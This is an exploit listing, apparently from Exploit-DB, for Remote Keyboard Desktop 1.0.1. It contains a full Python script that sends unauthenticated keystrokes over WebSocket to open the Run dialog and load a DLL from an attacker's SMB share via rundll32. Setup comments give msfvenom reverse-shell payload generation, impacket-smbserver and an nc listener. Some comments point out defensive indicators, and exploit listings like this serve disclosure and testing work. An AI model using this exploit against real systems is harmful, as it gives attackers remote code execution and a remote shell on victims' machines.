Remote Keyboard Desktop 1.0.1 - Remote Code Execution (RCE)

EDB-ID:

52299

CVE:

N/A




Platform:

Windows

Date:

2025-05-21


# Exploit Title: Remote Keyboard Desktop 1.0.1 - Remote Code Execution (RCE)
# Date: 05/17/2025
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://remotecontrolio.web.app/
# Software Link: https://apps.microsoft.com/detail/9n0jw8v5sc9m?hl=neutral&gl=US&ocid=pdpshare
# Version: 1.0.1
# Tested on: Windows 10 Pro Build 19045

# Start Remote Keyboard Desktop on the Windows host
# Preparing:
#
# 1. Generating payload (dll/exe):
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.8.105 LPORT=8080 -f dll > shell.dll
# 2. Start smb server: impacket-smbserver SHARE . -smb2support
# 3. nc -lnvp 8080
# 4. python exploit.py
#####

#!/usr/bin/env python3

import websocket
import json
import time

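target = "192.168.8.105"  # host running Remote Keyboard Desktop (its WebSocket listener)
lhost = "192.168.8.101"   # host serving the SMB share from step 2 of the header
WS_URL = f"ws://{target}:8080/"
payload = "shell2.dll"  # payload dll/exe filename
debug = False  # also handed to websocket.enableTrace() in __main__

# Only a User-Agent, an Origin and an extension header are set; no credential
# or token of any kind is sent with the connection. From a defensive standpoint
# this appears to be the weak point: keyboard_event frames are accepted from a
# client that merely mimics these headers.
HEADER_LIST = [
    "User-Agent: Dart/3.7 (dart:io)",
    f"Origin: http://{target}:8080",
    "Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits"
]

#SMB_PATH = f"cmd /c \\\\{lhost}\\SHARE\\{payload}" # exe based

# dll based. This string is typed into the Run dialog by on_open(). The
# observable on the endpoint is rundll32.exe started with a UNC path as its
# argument, followed by SMB traffic from the workstation to {lhost}.
# (The trailing comment of this line was wrapped onto its own line in the
# published copy, which made it a stray name; rejoined here.)
SMB_PATH = f"rundll32.exe \\\\{lhost}\\SHARE\\{payload},ExportedFunc"

# Characters that are not plain letters/digits, mapped to the key name the
# application expects; the bool says whether SHIFT has to be held for it.
special_mapping = {
    ' ': ("SPACE", False),
    '/': ("NUMPAD_DIVIDE", False),
    '\\': ("\\", False),
    '.': ("NUMPAD_DECIMAL", False),
    ',': (",", False),
}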

def send_key_event(ws, key, key_down):
    """Send a single keyboard_event frame for *key* over *ws*.

    key_down True means press, False means release; capsLock is always
    reported as off. The frame is the JSON the application consumes, so
    this is also the shape a detection rule on the WebSocket traffic
    would look for.
    """
    data = {"key": key, "keyDown": key_down, "capsLock": False}
    frame = json.dumps({"command": "keyboard_event", "data": data})
    ws.send(frame)

def send_text(ws, text, delay=0.05):
    """Type *text* one character at a time as press/release key events.

    SHIFT is held across consecutive characters that need it and released
    as soon as one that does not follows (and again at the end, if still
    held). Each character is followed by a *delay* second pause.

    Raises ValueError on a character with no mapping; events already sent
    for earlier characters are not undone.
    """
    def resolve(ch):
        # (key name, shift needed) for one character, mirroring the app's names.
        if ch in special_mapping:
            return special_mapping[ch]
        if ch.isalpha():
            return ch.upper(), ch.isupper()
        if ch.isdigit():
            return ch, False
        raise ValueError(f"No key mapping for character: {ch!r}")

    holding_shift = False
    for ch in text:
        key_name, need_shift = resolve(ch)
        # Toggle SHIFT only when the required state differs from the held one.
        if need_shift != holding_shift:
            send_key_event(ws, "SHIFT", need_shift)
            holding_shift = need_shift
        send_key_event(ws, key_name, True)
        send_key_event(ws, key_name, False)
        time.sleep(delay)

    if holding_shift:
        send_key_event(ws, "SHIFT", False)

def send_key(ws, keys, delay=0.05):
    """Press every key in *keys* in order, hold for *delay*, release in reverse order."""
    pressed = list(keys)
    for key in pressed:
        send_key_event(ws, key, True)
    time.sleep(delay)
    pressed.reverse()
    for key in pressed:
        send_key_event(ws, key, False)

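def on_open(ws):
    """Run the keystroke sequence once the WebSocket is connected.

    Win+R opens the Run dialog, SMB_PATH is typed into it, RETURN submits
    it, then the socket is closed. Nothing is read back from the target;
    the operator is told to check the listener instead. For defenders the
    artifacts this leaves are presumably a Run-dialog history entry and a
    rundll32.exe process whose argument is a UNC path — confirm on a test
    host.
    """
    print("Let's start!")

    send_key(ws, ["LEFT_WINDOWS", "R"])
    time.sleep(0.5)  # give the Run dialog time to appear before typing

    send_text(ws, SMB_PATH)
    send_key(ws, ["RETURN"])
    print("Executing...")
    time.sleep(1.2)

    print("Check your listener!")
    if debug:
        # The banner literal was split across two lines in the published
        # copy (a syntax error); rejoined into one string here.
        print("\033[42;37mExploit by blue0x1 - github.com/blue0x1\033[0m")

    ws.close()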

def on_message(ws, message):
    """Echo frames received from the target, but only when debug is on."""
    if not debug:
        return
    print("[=] Received:", message)

def on_error(ws, error):
    """Report a WebSocket error, but only when debug is on."""
    if not debug:
        return
    print("[!] Error:", error)

def on_close(ws, code, reason):
    """Report the close code and reason, but only when debug is on."""
    if not debug:
        return
    print(f"[x] Closed: {code} - {reason}")

if __name__ == "__main__":
    # Library tracing follows the module-level debug flag.
    websocket.enableTrace(debug)
    callbacks = dict(
        on_open=on_open,
        on_message=on_message,
        on_error=on_error,
        on_close=on_close,
    )
    ws = websocket.WebSocketApp(WS_URL, header=HEADER_LIST, **callbacks)
    ws.run_forever()